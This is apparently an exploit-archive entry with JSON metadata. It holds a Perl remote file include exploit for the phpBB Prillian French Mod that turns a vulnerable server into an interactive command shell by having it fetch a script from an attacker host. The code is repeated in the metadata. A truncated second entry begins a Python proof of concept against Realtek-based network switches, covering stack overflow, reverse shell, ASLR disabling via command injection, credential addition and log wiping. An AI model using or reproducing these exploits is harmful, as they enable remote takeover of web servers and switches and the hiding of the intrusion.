phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit
2006-10-13T00:00:00
ID 1337DAY-ID-987 Type zdt Reporter Nima Salehi Modified 2006-10-13T00:00:00
Description
Exploit for unknown platform in category web applications
==============================================================
phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit
==============================================================
#!/usr/bin/perl
#####################################################################################################
# #
# PhpBB Prillian French #
# #
# Class: Remote File Include Vulnerability #
# #
# Patch: unavailable #
# #
# Date: 2006/10/12 #
# #
# Remote: Yes #
# #
# Type: high #
# #
#####################################################################################################
use IO::Socket;
use LWP::Simple;
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script
print "\n";
print "##########################################################################\n";
print "# #\n";
print "# PhpBB Prillian French Remote File Include Vulnerability #\n";
print "# Bug found By : Ashiyane Corporation #\n";
print "# Web Site : www.Ashiyane.ir #\n";
print "# #\n";
print "##########################################################################\n";
if (@ARGV < 2)
{
print "\n Usage: Ashiyane.pl [host] [path] ";
print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vul="/language/lang_french/lang_prillian_faq.php?phpbb_root_path="
print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
print "<Shell> ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "<Shell> ";
$cmd = <STDIN>;
}
# 0day.today [2018-01-05] #
{"hash": "970de682cdbccf2523d7f0fd67d1ebe2001d03d5df6e988d2e757c76be39d75e", "id": "1337DAY-ID-987", "lastseen": "2018-01-05T21:13:26", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bad878ce92546233e9e69c63cfbbbf2a", "key": "href"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "modified"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0b711bb3a86d234678ca90bbe6d736ed", "key": "reporter"}, {"hash": "17dd966075384205a2490a701a40e098", "key": "sourceData"}, {"hash": "77124d089275a30d7925f456f636515e", "key": "sourceHref"}, {"hash": "02136e3d2223f73a254d8c851d44a162", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -1.1, "vector": "NONE", "modified": "2018-01-05T21:13:26"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32411", "1337DAY-ID-31805", "1337DAY-ID-30759", "1337DAY-ID-27921", "1337DAY-ID-27006", "1337DAY-ID-25853", "1337DAY-ID-24685", "1337DAY-ID-21146", "1337DAY-ID-20733", "1337DAY-ID-20185"]}, {"type": "exploitdb", "idList": ["EDB-ID:42148", "EDB-ID:27778"]}, {"type": "hackerone", "idList": ["H1:212696"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201612-37.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201612-37"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134710", "PACKETSTORM:134090"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/APACHE_MOD_CGI_BASH_ENV_EXEC", "MSF:EXPLOIT/MULTI/HTTP/AUXILIUM_UPLOAD_EXEC"]}, {"type": "seebug", "idList": ["SSV:81370"]}], "modified": "2018-01-05T21:13:26"}, "vulnersScore": -1.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/987", "description": "Exploit for unknown platform in category web applications", "title": "phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit", "history": [{"bulletin": {"hash": "67a85435e61fd0a8a5d30ad89b5a2bd432e957b058177134213fbf43acf41238", "id": "1337DAY-ID-987", "lastseen": "2016-04-19T23:54:42", "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T23:54:42"}}, "hashmap": [{"hash": "f4e76978ed72892b54436fb236eb8399", "key": "href"}, {"hash": "0b711bb3a86d234678ca90bbe6d736ed", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "02136e3d2223f73a254d8c851d44a162", "key": "title"}, {"hash": "6576fb92b14f01adca9718a51a9fcc8d", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "modified"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "published"}, {"hash": "c80b6373278302c0642ea902eb9827e4", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/987", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==============================================================\r\nphpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n#####################################################################################################\r\n# #\r\n# PhpBB Prillian French #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Patch: unavailable #\r\n# #\r\n# Date: 2006/10/12 #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n#####################################################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"##########################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# PhpBB Prillian French Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\r\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\r\nprint \"# #\\n\";\r\nprint \"##########################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\r\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$vul=\"/language/lang_french/lang_prillian_faq.php?phpbb_root_path=\"\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-10-13T00:00:00", "references": [], "reporter": "Nima Salehi", "modified": "2006-10-13T00:00:00", "href": "http://0day.today/exploit/description/987"}, "lastseen": "2016-04-19T23:54:42", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==============================================================\r\nphpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n#####################################################################################################\r\n# #\r\n# PhpBB Prillian French #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Patch: unavailable #\r\n# #\r\n# Date: 2006/10/12 #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n#####################################################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"##########################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# PhpBB Prillian French Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\r\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\r\nprint \"# #\\n\";\r\nprint \"##########################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\r\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$vul=\"/language/lang_french/lang_prillian_faq.php?phpbb_root_path=\"\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2006-10-13T00:00:00", "references": [], "reporter": "Nima Salehi", "modified": "2006-10-13T00:00:00", "href": "https://0day.today/exploit/description/987"}
{"zdt": [{"lastseen": "2019-12-04T20:00:01", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2019-10-01T00:00:00", "published": "2019-10-01T00:00:00", "id": "1337DAY-ID-33299", "href": "https://0day.today/exploit/description/33299", "title": "Cisco Small Business 220 Series - Multiple Vulnerabilities", "type": "zdt", "sourceData": "#!/usr/bin/python2.7\r\n#\r\n\"\"\"\r\n\r\n[Subject]\r\n\r\nRealtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)\r\nhttps://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller\r\n\r\n[Brief description]\r\n\r\n1.\tBoa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)\r\n\tNote: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding\r\n2.\tReuse of code between vendors gives almost indentical exploitation of found vulnerabilities\r\n3.\tTwo strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian\r\n\r\n[Goals for this PoC]\r\n\r\n1.\tOne Python PoC for all vendors\r\n\tUsing dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.\r\n\tThe python code will read and use details from dictionary when verifying/exploiting\r\n\r\n2.\tUniquely identify remote target\r\n\tETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware\r\n\r\n\tETag: xxxxx-yyyyy\r\n\txxxxx = file size (up to 5 digits)\r\n\tyyyyy = last modified (up to 5 digits)\r\n\r\n3.\tReverse shell\r\n\tMIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible\r\n\r\n4.\tadd/delete credentials for GUI/CLI\r\n\tQuite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'\r\n\tFor those who has added protection, we can add/delete credentials with an bit interesting jumping sequence\r\n\r\n[Technical brief]\r\n1.\tStack - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)\r\n2.\tHeap - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)\r\n3.\tfork - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell\r\n\r\nTwo vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,\r\nthis allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request\r\n\r\n[Basically]\r\nFirst buffer: [aaaaaaaa][0x58xxxxxx]\t('a' and 0x58 will be overwritten by second buffer)\r\nSecond buffer: [bbbbb][bbbbbbbb][0x00xxxxxx]\t(NULL termination will overwrite 0x58)\r\n\r\n[Known targets]\r\n\r\nAll below is fully exploitable, with following exception:\r\n[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]\r\n[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]\r\n\r\nNot because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,\r\nand 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.\r\n[They are still fully exploitable with the Boa/Hydra vulnerability]\r\n\r\nNote:\r\nIn this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.\r\n\r\n\r\n$ ./Realtek-RTL83xx-PoC.py --etag help\r\n\r\n[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)\r\n[*] RHOST: 192.168.57.20\r\n[*] RPORT: 80\r\n[*] LHOST: 192.168.57.1\r\n[*] LPORT: 1337\r\n[+] Target: List of known targets\r\n\r\n[*] ETag: 225-51973 [Cisco Systems, Inc. Sx220 v1.1.3.1]\r\n[*] ETag: 225-60080 [Cisco Systems, Inc. Sx220 v1.1.4.1]\r\n[*] ETag: 752-76347 [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]\r\n[*] ETag: 225-21785 [Pakedgedevice & Software Inc SX-8P v1.04]\r\n[*] ETag: 222-71560 [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]\r\n[*] ETag: 14044-509 [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]\r\n[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]\r\n[*] ETag: 218-22429 [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]\r\n[*] ETag: 218-7473 [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]\r\n[*] ETag: 752-95168 [DrayTek Corp. VigorSwitch P1100 v2.1.4]\r\n[*] ETag: 225-96283 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]\r\n[*] ETag: 225-63242 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]\r\n[*] ETag: 224-5061 [CERIO Corp. CS-2424G-24P v1.00.29]\r\n[*] ETag: 222-50100 [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]\r\n[*] ETag: 222-81176 [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]\r\n[*] ETag: 8028-89928 [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]\r\n[*] ETag: 222-64895 [Xhome DownLoop-G24M v3.0.0.43126]\r\n[*] ETag: 222-40570 [Realtek RTL8380-24GE-4GEC v3.0.0.43126]\r\n[*] ETag: 222-45866 [Abaniact AML2-PS16-17GP L2 v116B00033]\r\n[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]\r\n[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]\r\n[*] ETag: 609-31457 [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]\r\n[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]\r\n[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]\r\n\r\n\r\n[*] All done...\r\n\r\n[Other vendors]\r\nThese names have been found within some Firmware images, but not implemented as I have not found any Firmware images.\r\n(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')\r\n\r\n[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power\r\n\r\n[Known bugs]\r\n1.\tNon-JSON:\r\n\t'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'\r\n\t(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)\r\n\r\n[Responsible Disclosure]\r\nWorking with VDOO since early February 2019 to disclosure found vulnerabilities to vendors\r\nhttps://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches\r\n\r\n\r\n[Technical details]\r\nPlease read the code\r\n\r\n\"\"\"\r\n# Have a nice day\r\n# /bashis\r\n#\r\n\r\nimport string\r\nimport sys\r\nimport socket\r\nimport argparse\r\nimport urllib, urllib2, httplib\r\nimport base64\r\nimport ssl\r\nimport hashlib\r\nimport re\r\nimport struct\r\nimport time\r\nimport thread\r\nimport json\r\nimport inspect\r\nimport copy\r\n\r\nimport hashlib\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Cipher import PKCS1_v1_5\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto import Random\r\nfrom random import randint\r\n\r\nfrom pwn import * # pip install pwn\r\n\r\nglobal debug\r\ndebug = False\r\nglobal force\r\nforce = False\r\n\r\ndef DEBUG(direction, text):\r\n\tif debug:\r\n\t\t# Print send/recv data and current line number\r\n\t\tprint \"[BEGIN {}] <{:-^60}>\".format(direction, inspect.currentframe().f_back.f_lineno)\r\n\t\tprint \"\\n{}\\n\".format(text)\r\n\t\tprint \"[ END {}] <{:-^60}>\".format(direction, inspect.currentframe().f_back.f_lineno)\r\n\treturn\r\n\r\nclass HTTPconnect:\r\n\r\n\tdef __init__(self, host, proto, verbose, creds, Raw):\r\n\t\tself.host = host\r\n\t\tself.proto = proto\r\n\t\tself.verbose = verbose\r\n\t\tself.credentials = creds\r\n\t\tself.Raw = Raw\r\n\t\r\n\tdef Send(self, uri, query_headers, query_data,ID,encode_query):\r\n\t\tself.uri = uri\r\n\t\tself.query_headers = query_headers\r\n\t\tself.query_data = query_data\r\n\t\tself.ID = ID\r\n\t\tself.encode_query = encode_query\r\n\r\n\t\t# Connect-timeout in seconds\r\n\t\t#timeout = 5\r\n\t\t#socket.setdefaulttimeout(timeout)\r\n\r\n\t\turl = '{}://{}{}'.format(self.proto, self.host, self.uri)\r\n\r\n\t\tif self.verbose:\r\n\t\t\tlog.info(\"[Verbose] Sending: {}\".format(url))\r\n\r\n\t\tif self.proto == 'https':\r\n\t\t\tif hasattr(ssl, '_create_unverified_context'):\r\n\t\t\t\t#log.info(\"Creating SSL Unverified Context\")\r\n\t\t\t\tssl._create_default_https_context = ssl._create_unverified_context\r\n\r\n\t\tif self.credentials:\r\n\t\t\tBasic_Auth = self.credentials.split(':')\r\n\t\t\tif self.verbose:\r\n\t\t\t\tlog.info(\"[Verbose] User: {}, Password: {}\".format(Basic_Auth[0],Basic_Auth[1]))\r\n\t\t\ttry:\r\n\t\t\t\tpwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\n\t\t\t\tpwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])\r\n\t\t\t\tauth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)\r\n\t\t\t\topener = urllib2.build_opener(auth_handler)\r\n\t\t\t\turllib2.install_opener(opener)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tlog.info(\"Basic Auth Error: {}\".format(e))\r\n\t\t\t\tsys.exit(1)\r\n\r\n\t\tif self.query_data:\r\n\t\t\t#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)\r\n\t\t\tif self.query_data and self.encode_query:\r\n\t\t\t\trequest = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)\r\n\t\t\telse:\r\n\t\t\t\trequest = urllib2.Request(url, data=self.query_data, headers=self.query_headers)\r\n\r\n\t\t\tif self.ID:\r\n\t\t\t\trequest.add_header('Cookie', self.ID)\r\n\t\telse:\r\n\t\t\trequest = urllib2.Request(url, None, headers=self.query_headers)\r\n\t\t\tif self.ID:\r\n\t\t\t\trequest.add_header('Cookie', self.ID)\r\n\t\tresponse = urllib2.urlopen(request)\r\n\t\t#if response:\r\n\t\t#\tprint \"[<] {} OK\".format(response.code)\r\n\r\n\t\tif self.Raw:\r\n\t\t\treturn response\r\n\t\telse:\r\n\t\t\thtml = response.read()\r\n\t\t\treturn html\r\n\r\n#\r\n# Validate correctness of HOST, IP and PORT\r\n#\r\nclass Validate:\r\n\r\n\tdef __init__(self,verbose):\r\n\t\tself.verbose = verbose\r\n\r\n\t# Check if IP is valid\r\n\tdef CheckIP(self,IP):\r\n\t\tself.IP = IP\r\n\r\n\t\tip = self.IP.split('.')\r\n\t\tif len(ip) != 4:\r\n\t\t\treturn False\r\n\t\tfor tmp in ip:\r\n\t\t\tif not tmp.isdigit():\r\n\t\t\t\treturn False\r\n\t\ti = int(tmp)\r\n\t\tif i < 0 or i > 255:\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\t# Check if PORT is valid\r\n\tdef Port(self,PORT):\r\n\t\tself.PORT = PORT\r\n\r\n\t\tif int(self.PORT) < 1 or int(self.PORT) > 65535:\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn True\r\n\r\n\t# Check if HOST is valid\r\n\tdef Host(self,HOST):\r\n\t\tself.HOST = HOST\r\n\r\n\t\ttry:\r\n\t\t\t# Check valid IP\r\n\t\t\tsocket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP\r\n\t\t\t# Now we check if it is correct typed IP\r\n\t\t\tif self.CheckIP(self.HOST):\r\n\t\t\t\treturn self.HOST\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\t\texcept socket.error as e:\r\n\t\t\t# Else check valid FQDN name, and use the IP address\r\n\t\t\ttry:\r\n\t\t\t\tself.HOST = socket.gethostbyname(self.HOST)\r\n\t\t\t\treturn self.HOST\r\n\t\t\texcept socket.error as e:\r\n\t\t\t\treturn False\r\n\r\nclass Vendor:\r\n\r\n\tdef __init__(self, ETag):\r\n\t\tself.ETag = ETag\r\n\r\n\tdef random_string(self,length):\r\n\t\tself.length = length\r\n\r\n\t\treturn \"a\" * self.length\r\n\t\t#return ''.join(random.choice(string.lowercase) for i in range(self.length))\r\n\r\n\t#\r\n\t# Source: https://gist.github.com/angstwad/bf22d1822c38a92ec0a9\r\n\t#\r\n\tdef dict_merge(self, dct, merge_dct):\r\n\t\t\"\"\" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of\r\n\t\tupdating only top-level keys, dict_merge recurses down into dicts nested\r\n\t\tto an arbitrary depth, updating keys. The ``merge_dct`` is merged into\r\n\t\t``dct``.\r\n\t\t:param dct: dict onto which the merge is executed\r\n\t\t:param merge_dct: dct merged into dct\r\n\t\t:return: None\r\n\t\t\"\"\"\r\n\t\tfor k, v in merge_dct.iteritems():\r\n\t\t\tif (k in dct and isinstance(dct[k], dict)\r\n\t\t\t\t\tand isinstance(merge_dct[k], collections.Mapping)):\r\n\t\t\t\tself.dict_merge(dct[k], merge_dct[k])\r\n\t\t\telse:\r\n\t\t\t\tdct[k] = merge_dct[k]\r\n\r\n\r\n\t#\r\n\t# Difference between vendors and Firmware versions.\r\n\t# The update code will search below and update the template on the fly\r\n\t# (you can tweak and add code in the template from here)\r\n\t#\r\n\t# ETag - excellent tool for determine the target\r\n\t#\r\n\t# ETag: xxxxx-yyyyy\r\n\t# xxxxx = file size (up to 5 digits)\r\n\t# yyyyy = last modified (up to 5 digits)\r\n\t#\r\n\tdef dict(self):\r\n\r\n\t\tVendor_ETag = {\r\n\t\t\t#\r\n\t\t\t# PLANET Technology Corp.\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'218-22429': {\r\n\t\t\t\t'template':'Planet',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.0b171116',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'GS-4210-8P2S',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.planet.com.tw/en/product/GS-4210-8P2S',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E04C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484029c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x423B9C,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x4243FC,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x489368,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x48AB84,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x48C240,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42DA80,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42DA80,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42C868,# Jump one after 'sw 